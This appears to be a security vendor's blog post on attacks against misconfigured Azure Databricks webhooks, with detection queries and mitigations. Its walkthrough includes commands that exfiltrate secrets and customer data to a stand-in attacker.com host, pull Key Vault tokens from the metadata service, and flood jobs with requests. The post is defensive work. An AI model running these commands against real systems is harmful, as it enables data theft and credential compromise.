Introduction
Azure Databricks is a powerful data analytics and machine learning platform that enables organizations to process large datasets efficiently. One of its key automation features is the use of webhooks, which allow external services to trigger Databricks jobs, workflows, or data pipelines in response to events. Webhooks provide seamless integration with CI/CD pipelines, monitoring tools, and third-party applications.
However, if not configured securely, Databricks webhooks can become a silent backdoor for attackers, allowing them to execute arbitrary code, manipulate data, or even escalate privileges within the environment. Unauthorized webhook access can lead to remote code execution, data exfiltration, and financial losses due to unauthorized compute usage.
This blog explores the security risks associated with Databricks webhooks, how attackers exploit misconfigurations, and best practices for securing webhook-based executions.
What are Databricks Jobs, Notebooks, and Webhooks?
Databricks Jobs
Databricks Jobs automate notebooks, scripts, or SQL queries on a cluster. They are used for ETL, machine learning training, and scheduled workflows, and can run manually, on a schedule, or via external triggers.
Databricks Notebooks
Notebooks provide an interactive coding environment for Python, Scala, SQL, and R, used for data exploration, analysis, and visualization. If misconfigured, they can expose sensitive data or allow unauthorized code execution.
Databricks Webhooks
Databricks Webhooks allow external applications and services to trigger jobs or execute notebooks via HTTP requests. They enable seamless integrations with CI/CD pipelines, monitoring tools, and real-time data processing workflows.
A webhook triggering a Databricks job via API might look like this:
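As a rough illustration, the request can be sketched in Python. The endpoint path and the `job_id` body mirror the cURL calls later in this post; the helper name `build_run_now_request`, the workspace URL, and the token value are hypothetical placeholders. The sketch only builds the request and does not send it.

```python
import json
import urllib.request


def build_run_now_request(workspace_url: str, token: str, job_id: int) -> urllib.request.Request:
    """Build (but do not send) a POST to the Jobs API run-now endpoint."""
    body = json.dumps({"job_id": job_id}).encode("utf-8")
    return urllib.request.Request(
        url=f"{workspace_url.rstrip('/')}/api/2.1/jobs/run-now",
        data=body,
        method="POST",
        headers={
            # A securely configured caller always presents a bearer token.
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
    )


# Placeholder values for illustration only (assumptions, not real credentials).
request = build_run_now_request(
    "https://adb-example.azuredatabricks.net", "EXAMPLE_TOKEN", 1234
)
print(request.get_method(), request.full_url)
print(request.data.decode("utf-8"))
```

Building the request separately from sending it makes it easy to inspect exactly which headers and body a caller would present.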
When configured securely, webhooks provide automation benefits, but if they lack authentication, are publicly accessible, or have overprivileged execution roles, attackers can exploit them to execute arbitrary code within a Databricks environment. A compromised webhook can lead to remote code execution, unauthorized data access, or service disruptions.
How Databricks Webhooks Work in Practice
A Databricks job webhook is usually set up in the following way:
- A user creates a Databricks job.
- A webhook URL is generated to trigger the job via an HTTP request.
- An external service sends a POST request to the webhook to start the job.
- The job executes the specified notebook, script, or Spark job on a Databricks cluster.
Example of calling a webhook manually:
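A minimal sketch of a manual call, assuming the trigger is the Jobs API `run-now` endpoint used elsewhere in this post and that the reply carries a `run_id` field. The `send` callable is a hypothetical transport hook; here it is replaced by a stand-in (`fake_send`) so the example runs without network access.

```python
import json
from typing import Callable, Dict


def trigger_job(
    send: Callable[[str, Dict[str, str], bytes], bytes],
    workspace_url: str,
    token: str,
    job_id: int,
) -> int:
    """POST to run-now through `send` and return the run_id from the reply."""
    url = f"{workspace_url.rstrip('/')}/api/2.1/jobs/run-now"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    payload = json.dumps({"job_id": job_id}).encode("utf-8")
    reply = json.loads(send(url, headers, payload))
    return reply["run_id"]


def fake_send(url: str, headers: Dict[str, str], payload: bytes) -> bytes:
    """Stand-in transport: records the call and returns a canned reply."""
    fake_send.calls.append((url, headers, payload))
    return json.dumps({"run_id": 42, "number_in_job": 1}).encode("utf-8")


fake_send.calls = []
run_id = trigger_job(
    fake_send, "https://adb-example.azuredatabricks.net", "EXAMPLE_TOKEN", 1234
)
print(run_id)
```

In real use, `send` would wrap an HTTP client; keeping it injectable also makes it straightforward to log every trigger attempt in one place.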
Attacker Methodology
When Databricks webhooks are misconfigured, they can serve as a silent entry point for attackers to execute arbitrary code, manipulate data, or escalate privileges. A poorly secured webhook, especially one lacking authentication or network restrictions, can be exploited remotely without direct access to the Databricks workspace.
Below, we explore the common misconfigurations that lead to exploitation, the techniques attackers use to discover and abuse vulnerable webhooks, and how these attacks can escalate to more severe security breaches.
Common Misconfigurations Leading to Vulnerabilities
Publicly Accessible Webhooks
If a webhook lacks authentication, attackers can send requests to trigger jobs.
Exposed API Tokens
If webhook URLs or authentication tokens are leaked in logs, repositories, or hardcoded in scripts, attackers can hijack them.
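Defenders can look for this kind of leak before attackers do. The sketch below scans text for strings shaped like Databricks personal access tokens. The pattern (`dapi` followed by 32 hexadecimal characters, with an optional numeric suffix) is an assumption based on the commonly seen token shape, and `find_leaked_tokens` is a hypothetical helper, not part of any Databricks tool.

```python
import re
from typing import List, Tuple

# Assumed token shape: "dapi" + 32 hex characters, optional "-<digits>" suffix.
TOKEN_PATTERN = re.compile(r"\bdapi[0-9a-f]{32}(?:-\d+)?\b")


def find_leaked_tokens(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, masked_token) for every token-like string found."""
    hits = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for match in TOKEN_PATTERN.finditer(line):
            # Mask the value so the scanner's own output does not leak it again.
            hits.append((line_number, match.group(0)[:8] + "..."))
    return hits


# Obviously fake sample content for illustration.
sample = (
    'HOST = "https://adb-example.azuredatabricks.net"\n'
    'TOKEN = "dapi' + "0123456789abcdef" * 2 + '"\n'
)
print(find_leaked_tokens(sample))
```

A check like this could run over scripts, logs, or repository contents before they are shared; any hit should be treated as a token to revoke, not just to delete.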
Overprivileged Jobs
Jobs triggered by webhooks often run with high privileges, allowing attackers to access the Databricks File System (DBFS), Azure Key Vault, or Azure Storage accounts.
Lack of IP Restrictions
If IP whitelisting is not enforced, anyone on the internet can trigger webhooks.
How Attackers Exploit Databricks Webhooks
Discovering Vulnerable Webhooks
Attackers use internet scanning tools like Shodan, or search public GitHub repositories, to find exposed webhook URLs and tokens.
Triggering Unauthorized Job Executions
If the webhook lacks authentication, attackers send a request to execute a malicious Spark job, potentially leading to privilege escalation.
Executing Malicious Code via Webhook Jobs
Attackers can inject malicious code into a job:
import os
os.system("curl -X POST http://attacker.com --data $(cat /dbfs/secrets.txt)")
This script exfiltrates sensitive data to an attacker-controlled server.
Lateral Movement Using Overprivileged Webhooks
If the webhook job has access to Databricks storage, Key Vault, or Azure resources, attackers can:
List storage contents:
dbutils.fs.ls("dbfs:/mnt/")
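Request a managed identity token from the Azure Instance Metadata Service, which can then be used to read Azure Key Vault secrets (the full form with the api-version and resource parameters appears in Scenario B):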
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token"
Attack Walkthrough
Scenario A: Exploiting an Unauthenticated Webhook for Remote Code Execution
Step 1: Discover the Vulnerable Webhook
The attacker looks for exposed Databricks API endpoints and webhook URLs, and uses GitHub search to find tokens hardcoded in public repositories.
Step 2: Invoke the Webhook to Execute Arbitrary Code
The attacker sends a POST request to the webhook, triggering an unauthorized job execution:
curl -X POST https://<databricks-instance>/api/2.1/jobs/run-now -H "Content-Type: application/json" -d '{"job_id": 1234}'
Step 3: Exploit for Data Exfiltration
The attacker modifies the job to extract sensitive data from the Databricks File System (DBFS):
dbutils.fs.cp("dbfs:/mnt/customer-data.csv", "file:/tmp/exfiltrated.csv")
They then use a simple cURL command to send the file to an external server:
curl -X POST -F "file=@/tmp/exfiltrated.csv" http://attacker.com/upload
Step 4: Maintain Access or Escalate Privileges
The attacker ensures persistence by modifying the Databricks job to execute their payload periodically. The Quartz cron expression below fires every five minutes:
{
  "job_id": 1234,
  "schedule": {
    "quartz_cron_expression": "0 0/5 * * * ?",
    "timezone_id": "UTC"
  }
}
Scenario B: Using a Webhook to Escalate Privileges and Access Azure Resources
Step 1: Identify a Misconfigured Webhook with Excessive Privileges
The attacker lists available jobs and examines their execution context:
databricks jobs list --output JSON | jq '.jobs[] | {job_id, settings}'
Step 2: Use the Webhook to Invoke a Privileged Job
The attacker triggers a high-privilege job using the compromised webhook:
curl -X POST https://<databricks-instance>/api/2.1/jobs/run-now -H "Authorization: Bearer <token>" -d '{"job_id": 6789}'
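Step 3: Extract Secrets from Key Vault Using Databricks Execution Context
From code running inside the job, the attacker requests an access token scoped to Key Vault (resource=https://vault.azure.net) from the Azure Instance Metadata Service: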
TOKEN=$(curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://vault.azure.net" | jq -r .access_token)
Step 4: Use Extracted Secrets to Access Other Azure Resources
Using stolen credentials, the attacker moves laterally to access and modify other resources.
Scenario C: Denial-of-Service (DoS) Attack Using Webhook Flooding
Step 1: Identify a High-Cost Webhook Execution
The attacker targets a job that runs on a powerful cluster, incurring high costs.
Step 2: Flood the Webhook with Repeated Requests
while true; do
curl -X POST https://<databricks-instance>/api/2.1/jobs/run-now -d '{"job_id": 5678}'
done
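One way to blunt this kind of flooding is to rate-limit trigger requests before they reach the job. The following is a minimal sketch of a sliding-window limiter, assuming a hypothetical gateway or proxy sits in front of the webhook; the class name and the limits are illustrative, not a Databricks feature.

```python
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `max_requests` within any `window_seconds` span."""

    def __init__(self, max_requests: int, window_seconds: float) -> None:
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._timestamps = deque()

    def allow(self, now: float) -> bool:
        # Drop timestamps that have aged out of the window.
        while self._timestamps and now - self._timestamps[0] >= self.window_seconds:
            self._timestamps.popleft()
        if len(self._timestamps) >= self.max_requests:
            return False  # Over the limit: reject this trigger.
        self._timestamps.append(now)
        return True


# Illustrative limit: three triggers per 60 seconds.
limiter = SlidingWindowLimiter(max_requests=3, window_seconds=60)
decisions = [limiter.allow(t) for t in (0, 1, 2, 3)]
print(decisions)
```

Passing the clock value in as `now` keeps the limiter deterministic and easy to test; a real deployment would feed it `time.monotonic()` and keep one limiter per caller or per job.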
Investigating and Uncovering Vulnerabilities
Step 1: Identify Exposed Webhooks
databricks jobs list --output JSON | jq '.jobs[] | {job_id, settings}'
Step 2: Check Audit Logs for Suspicious Executions
AzureDiagnostics
| where Category == "Databricks"
| where OperationName contains "RunSubmit"
| where CallerIPAddress !in ("trusted_IP1", "trusted_IP2")
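The same filter can be applied offline to exported log records. A minimal sketch, assuming each record is a dictionary carrying the `OperationName` and `CallerIPAddress` fields used in the query above and that trusted sources are expressed as CIDR ranges. The function names are hypothetical and the sample addresses come from documentation ranges, not real hosts.

```python
import ipaddress
from typing import Dict, Iterable, List


def is_trusted(ip: str, trusted_networks: Iterable[str]) -> bool:
    """True if `ip` falls inside any of the trusted CIDR ranges."""
    address = ipaddress.ip_address(ip)
    return any(address in ipaddress.ip_network(net) for net in trusted_networks)


def suspicious_runs(
    records: Iterable[Dict[str, str]], trusted_networks: List[str]
) -> List[Dict[str, str]]:
    """Keep run-submission records whose caller is outside the trusted ranges."""
    return [
        record
        for record in records
        if "RunSubmit" in record["OperationName"]
        and not is_trusted(record["CallerIPAddress"], trusted_networks)
    ]


# Illustrative records and ranges (assumptions, not real log data).
records = [
    {"OperationName": "RunSubmit", "CallerIPAddress": "203.0.113.10"},
    {"OperationName": "RunSubmit", "CallerIPAddress": "198.51.100.7"},
    {"OperationName": "ClusterStart", "CallerIPAddress": "198.51.100.7"},
]
flagged = suspicious_runs(records, ["203.0.113.0/24"])
print(flagged)
```

Matching on CIDR ranges rather than exact strings avoids maintaining a long list of individual trusted addresses.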
Step 3: Identify Data Exfiltration Attempts
AzureDiagnostics
| where Category == "Databricks"
| where OperationName == "DbfsCopy"
| where ResourceId contains "mnt"
How to Mitigate
- Enforce Authentication for Webhooks
  - Require OAuth tokens or API keys for webhook requests.
  - Example: Secure API requests with a bearer token.
- Restrict Webhook Execution Permissions
  - Use least privilege access for webhook jobs.
  - Avoid running webhook-triggered jobs with Administrator privileges.
- Implement IP Whitelisting
  - Restrict webhook access to trusted IP ranges in Azure Firewall.
- Enable Audit Logging for Webhooks
  - Monitor who triggers webhooks and from where using Azure Monitor and Databricks audit logs.
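The bearer-token requirement can be sketched as follows. This assumes a hypothetical receiving service or gateway that sees the incoming request headers before anything is forwarded to Databricks; the function names and token values are illustrative only.

```python
import hmac
from typing import Mapping, Optional


def extract_bearer_token(headers: Mapping[str, str]) -> Optional[str]:
    """Return the token from an 'Authorization: Bearer <token>' header, if any."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not token.strip():
        return None
    return token.strip()


def is_authorized(headers: Mapping[str, str], expected_token: str) -> bool:
    """Reject requests with a missing, malformed, or incorrect bearer token."""
    presented = extract_bearer_token(headers)
    if presented is None:
        return False
    # compare_digest runs in constant time, which avoids leaking how much
    # of the token matched through response timing.
    return hmac.compare_digest(
        presented.encode("utf-8"), expected_token.encode("utf-8")
    )


# Placeholder secret for illustration; load real secrets from a secret store.
EXPECTED = "EXAMPLE_TOKEN"
print(is_authorized({"Authorization": "Bearer EXAMPLE_TOKEN"}, EXPECTED))
print(is_authorized({}, EXPECTED))
```

Requests that fail this check should be dropped and logged, so that the audit trail described above also captures rejected trigger attempts.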
Cyngular Security's CIRA Platform
To further secure your cloud environment, consider integrating Cyngular Security's CIRA platform. It enhances your security posture by providing advanced investigation and response capabilities, enabling your team to address threats swiftly and effectively.